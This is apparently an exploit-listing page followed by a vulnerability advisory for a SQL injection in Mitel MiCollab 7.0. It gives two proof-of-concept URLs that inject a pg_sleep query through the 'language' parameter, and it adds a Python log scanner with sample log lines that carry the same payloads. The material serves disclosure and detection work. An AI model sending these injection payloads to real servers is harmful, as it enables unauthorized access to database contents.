
22 new exploits

Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)
Windows XP SP3 x86 and 2003 SP2 x86 - NDProxy Privilege Escalation (MS14-002)
exim <= 4.84-3 - Local Root Exploit
Exim <= 4.84-3 - Local Root Exploit
CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow
OS X / iOS Suid Binary Logic Error Kernel Code Execution
Multiple CCTV-DVR Vendors - Remote Code Execution
MiCollab 7.0 - SQL Injection Vulnerability
Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans
Avira - Heap Underflow Parsing PE Section Headers
Comodo - PackMan Unpacker Insufficient Parameter Validation
Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks
Comodo - Integer Overflow Leading to Heap Overflow Parsing Composite Documents
Wireshark - dissect_ber_integer Static Out-of-Bounds Write
Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation
Comodo Antivirus - Heap Overflow in LZX Decompression
OS X Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
Adobe Flash - Shape Rendering Crash
Adobe Flash - Zlib Codec Heap Overflow
Adobe Flash - Sprite Creation Use-After-Free
Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix
Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix
Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix
OS X Kernel - AppleKeyStore Use-After-Free
OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver
OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver

================
Exploit Title: SQL Injection Vulnerability in MiCollab v7.0
Date: 3-22-2016
Vendor Homepage: http://www.mitel.com
Vendor: Mitel
Software: MiCollab End User Portal
Version: v7.0
Advisory: http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
CVSS: 7.5

Product Summary
================
Mitel MiCollab delivers unified messaging, mobility, teleworking, and audio, web and video conferencing services tailored to the needs of today's mobile workforce. (http://www.mitel.com/products/collaboration-software/mitel-micollab)

Vulnerabilities
================
A SQL injection vulnerability has been identified in MiCollab 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the MiCollab database. (http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001)

The vulnerability is due to the unsanitized 'language' parameter in the 'mywindow' and 'PortletSelector' scripts.

Proof of concept
================
http://server/portal/portal/portal/portal/mywindow?portlets=&page=org.apache.jetspeed.om.page.impl.ContentPageImpl%40d57dde06&language=en_US';SELECT%20pg_sleep(5);--
http://server/portal/portal/portal/PortletSelector?portlets=&page=org.apache.jetspeed.om.page.impl.ContentPageImpl%40d57dde06&language=en_US';SELECT%20pg_sleep(5);--
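
Added example (not part of the original advisory and not Mitel's code): a log check that flags requests to the two scripts named above whose 'language' value is not a plain locale tag, which is how the PoC requests appear in an access log. The log format, the locale pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoints the advisory names as taking the unsanitized 'language' parameter.
AFFECTED = ("/mywindow", "/PortletSelector")
# Assumption: legitimate values are plain locale tags such as "en_US" or "fr".
LOCALE = re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z]{2})?")
# Assumption: access logs carry the request line as "METHOD target HTTP/x.y".
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def bad_language(target):
    """Return the decoded 'language' value if it is not a locale tag, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(AFFECTED):
        return None
    # Split on '&' only, so a ';' stays part of the value under inspection.
    for pair in parts.query.split("&"):
        key, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if unquote_plus(key) == "language" and value and not LOCALE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, offending_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        bad = bad_language(match.group(1)) if match else None
        if bad is not None:
            hits.append((number, bad))
    return hits

# Constructed sample log lines (documentation addresses, made-up timestamps).
SAMPLE_LOG = """\
192.0.2.10 - - [22/Mar/2016:10:00:01 +0000] "GET /portal/portal/portal/portal/mywindow?portlets=&page=home&language=en_US HTTP/1.1" 200 5120
192.0.2.77 - - [22/Mar/2016:10:00:09 +0000] "GET /portal/portal/portal/PortletSelector?portlets=&page=home&language=en_US';SELECT%20pg_sleep(5);-- HTTP/1.1" 200 5120
192.0.2.77 - - [22/Mar/2016:10:00:21 +0000] "GET /portal/portal/portal/portal/mywindow?portlets=&page=home&language=en_US%27%3BSELECT%20pg_sleep(5)%3B-- HTTP/1.1" 200 5120
192.0.2.10 - - [22/Mar/2016:10:01:02 +0000] "GET /portal/help?language=fr HTTP/1.1" 200 812
""".splitlines()

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious language value {value!r}")
```

The same allowlist pattern can be enforced in front of the portal (reverse proxy or WAF rule) until the vendor fix from the advisory is applied.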

Timeline
================
2016-02-01: Vendor advisory published
2016-03-22: PoC details published

Discovered by
================
Goran Tuzovic -- Goran [at] illumant.com

References
================
1. http://www.mitel.com/products/collaboration-software/mitel-micollab
2. http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001

About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/